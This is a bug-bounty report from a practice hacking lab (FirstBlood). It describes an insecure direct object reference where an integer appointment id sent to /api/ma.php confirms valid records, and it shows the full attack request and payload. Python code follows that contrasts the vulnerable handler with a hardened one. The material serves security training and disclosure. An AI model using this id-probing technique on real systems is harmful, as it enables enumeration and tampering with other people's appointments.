FirstBlood-#129 — IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel
This issue was discovered on FirstBlood v1
On 2021-05-10, jpdev Level 3 reported:
Summary
Using the aptid parameter found on manageappointment.php, you can use this in place of the id parameter. This will ONLY confirm that the numerical id is valid and returns a success message. It does not cancel the appointment. If you do not have access to the drpanel, you can use this bug in a bug chain to amend the messages on the appointment; see report 127.
Example of its use in a chain:
Use the below to confirm the id is valid; with the id, perform the attack referenced in report id = 127: https://www.bugbountyhunter.com/hackevents/report?id=127
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10

act=cancel&aptid=56911904
P2 High
Endpoint: POST /api/ma.php
Parameter: aptid=
Payload: 56911904
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint ma.php (to modify an appointment) allows integer values to be used when modifying appointments. A bad case of security through obscurity was attempted.
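As an added illustration (not code from the FirstBlood application or from the reporter), the Python below models the reported behaviour next to a hardened handler: a bare integer is matched against the internal row id and answered with a success message, so the endpoint becomes an oracle for valid ids, whereas the fixed version accepts only the UUID token, checks ownership against the session, and returns one uniform failure body. The appointment store, the second UUID and the session user names are constructed assumptions.

```python
import re

# Constructed sample data: two appointments, each reachable only by the UUID token
# shown to its owning patient. The integer row id mirrors the numeric value the
# report sends in place of the UUID; it must never be accepted from the client.
APPOINTMENTS = {
    "81435813-e40a-411d-af19-6e2d89963493": {"row_id": 56911904, "owner": "patient-a", "status": "booked"},
    "4f6c2b3e-9d1a-4c4e-8a2f-0f3b8e6d1c77": {"row_id": 56911905, "owner": "patient-b", "status": "booked"},
}

UUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$")
GENERIC_FAILURE = {"status": "error", "message": "Unable to process request"}


def vulnerable_cancel(aptid: str) -> dict:
    """Models the reported behaviour: a digit-only aptid is matched against the
    internal row id and answered with success without cancelling anything, so
    the response leaks whether a numeric id exists (and nothing ties it to a user)."""
    if aptid.isdigit():
        for appt in APPOINTMENTS.values():
            if appt["row_id"] == int(aptid):
                return {"status": "success", "message": "Appointment updated"}
        return GENERIC_FAILURE
    appt = APPOINTMENTS.get(aptid)
    if appt is None:
        return GENERIC_FAILURE
    appt["status"] = "cancelled"
    return {"status": "success", "message": "Appointment cancelled"}


def hardened_cancel(aptid: str, session_user: str) -> dict:
    """Hardened handler: only the exact UUID token format is accepted, the
    appointment must belong to the authenticated session user, and unknown and
    not-owned ids get the identical body so validity cannot be probed."""
    token = aptid.strip().lower()
    if not UUID_RE.fullmatch(token):
        return GENERIC_FAILURE
    appt = APPOINTMENTS.get(token)
    if appt is None or appt["owner"] != session_user:
        return GENERIC_FAILURE  # same answer whether the id is missing or someone else's
    appt["status"] = "cancelled"
    return {"status": "success", "message": "Appointment cancelled"}
```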